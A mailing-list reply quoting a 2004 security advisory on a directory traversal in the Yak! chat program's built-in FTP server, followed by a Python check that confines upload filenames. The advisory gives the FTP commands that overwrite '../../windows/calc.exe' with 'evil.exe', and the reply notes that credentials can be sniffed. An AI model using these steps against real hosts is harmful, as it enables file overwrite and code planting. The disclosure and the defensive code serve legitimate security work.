In-Reply-To: <20041015193318.3257e4eb.aluigi@xxxxxxxxxxxxx>

===========================================================================

In a previous post I reported this issue.

http://www.securityfocus.com/bid/8581/
http://cert.uni-stuttgart.de/archive/bugtraq/2003/11/msg00222.html

I'm NOT sure if the PUT command works perfectly, coz with the versions I
played with I couldn't upload files successfully, and a password calculator
isn't required to know the passwords. Just a little sniffer would reveal
the username and password clearly.

===========================================================================

>Date: Fri, 15 Oct 2004 19:33:18 +0000
>From: Luigi Auriemma <aluigi@xxxxxxxxxxxxx>
>To: bugtraq@xxxxxxxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx,
>    news@xxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxx,
>    vuln@xxxxxxxxxxx
>Subject: Directory traversal in Yak! 2.1.2
>Message-Id: <20041015193318.3257e4eb.aluigi@xxxxxxxxxxxxx>
>
>
>#######################################################################
>
>                             Luigi Auriemma
>
>Application:  Yak!
>              http://www.digicraft.com.au/yak/
>Versions:     <= 2.1.2
>Platforms:    Windows
>Bug:          directory traversal (upload)
>Exploitation: remote
>Date:         15 October 2004
>Author:       Luigi Auriemma
>              e-mail: aluigi@xxxxxxxxxxxxxx
>              web:    http://aluigi.altervista.org
>
>
>#######################################################################
>
>
>1) Introduction
>2) Bug
>3) The Code
>4) Fix
>
>
>#######################################################################
>
>===============
>1) Introduction
>===============
>
>
>Yak! is a serverless chat system for Windows that lets people chat
>and exchange files.
>
>
>#######################################################################
>
>======
>2) Bug
>======
>
>
>When the program starts it creates a username and password for each
>IP address of the computer's network interfaces.
>This login information is needed to grant other Yak! hosts access to
>the built-in FTP server (used only to receive files).
>
>The problem is just in this FTP server, because the input of the clients
>is not filtered, so it is possible to upload files anywhere on the disk
>on which the upload directory of Yak! is located (by default the system's
>temporary folder), overwriting existing ones.
>
>Naturally it is also possible to see any remote directory and file (but
>it seems only C: can be browsed, even if the upload folder is set on
>another disk), while download is prevented by the program because it has
>been designed to receive files only.
>
>
>#######################################################################
>
>===========
>3) The Code
>===========
>
>
>Do the following operations:
>
>Download my "Yak! username and password calculator"
>http://aluigi.altervista.org/papers/yakcalc.zip to retrieve the
>username and password to access the FTP server of a specific Yak!
>host.
>
>Then connect to the Yak! FTP port, usually 3535:
>
>  C:\>ftp
>  ftp> open HOST 3535
>
>Enter the calculated username and password and upload your files like
>in the following example:
>
>  dir /
>  dir ../../windows/
>
>  put
>  evil.exe
>  ../../windows/calc.exe
>
>(slash and backslash have the same effect)
>
>
>#######################################################################
>
>======
>4) Fix
>======
>
>
>No fix.
>The vendor was contacted exactly one month ago but no patch is
>available.
>
>
>#######################################################################
>
>
>---
>Luigi Auriemma
>http://aluigi.altervista.org
>
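Section 2 of the quoted advisory gives the root cause: the receiving FTP server hands client-supplied PUT filenames to the filesystem unfiltered, so ".." segments (with slash or backslash alike, as section 3 notes) leave the upload folder. The following is an added example of the filename-confinement check such a server needs; it is not Yak! code or the advisory author's, and the upload root, the function names and the sample PUT names are assumed or constructed.

```python
import re

# Added example, not Yak! code: confine a client-supplied PUT filename to
# the upload folder. UPLOAD_ROOT is an assumed default (the advisory only
# says "the system's temporary folder"); every name here is hypothetical.
UPLOAD_ROOT = "C:/Windows/Temp/Yak"

_DRIVE_PREFIX = re.compile(r"^[A-Za-z]:")


class TraversalError(ValueError):
    """Raised for a name that would land outside the upload folder."""


def safe_upload_path(client_name: str, root: str = UPLOAD_ROOT) -> str:
    """Return the path under `root` for `client_name`, or raise.

    Backslash and slash are treated alike, matching the advisory's note
    that both worked against the vulnerable server.
    """
    if "\x00" in client_name:           # NUL would truncate in a C runtime
        raise TraversalError("NUL byte in name")
    name = client_name.replace("\\", "/")
    if name.startswith("/") or _DRIVE_PREFIX.match(name):
        raise TraversalError(f"absolute or drive path refused: {client_name!r}")
    # Drop empty and "." segments; refuse any segment made only of dots
    # (".." escapes; "..." is refused too as a conservative rule).
    parts = [p for p in name.split("/") if p not in ("", ".")]
    if not parts or any(set(p) == {"."} for p in parts):
        raise TraversalError(f"traversal refused: {client_name!r}")
    return root.rstrip("/") + "/" + "/".join(parts)


def check_put_requests(names):
    """Split constructed PUT names into (accepted paths, rejected names)."""
    accepted, rejected = [], []
    for n in names:
        try:
            accepted.append(safe_upload_path(n))
        except TraversalError:
            rejected.append(n)
    return accepted, rejected


if __name__ == "__main__":
    # Constructed sample of names a client might send with PUT, including
    # the advisory's own "../../windows/calc.exe" in both slash styles.
    sample = ["evil.exe", "../../windows/calc.exe", "..\\..\\windows\\calc.exe",
              "C:\\boot.ini", "docs/./readme.txt", ".."]
    ok, bad = check_put_requests(sample)
    print("accepted:", ok)
    print("rejected:", bad)
```

Reserved Windows device names (CON, NUL, ...) and trailing dots or spaces in a segment are a separate Windows-specific concern not covered here; the check above only addresses the traversal the advisory describes.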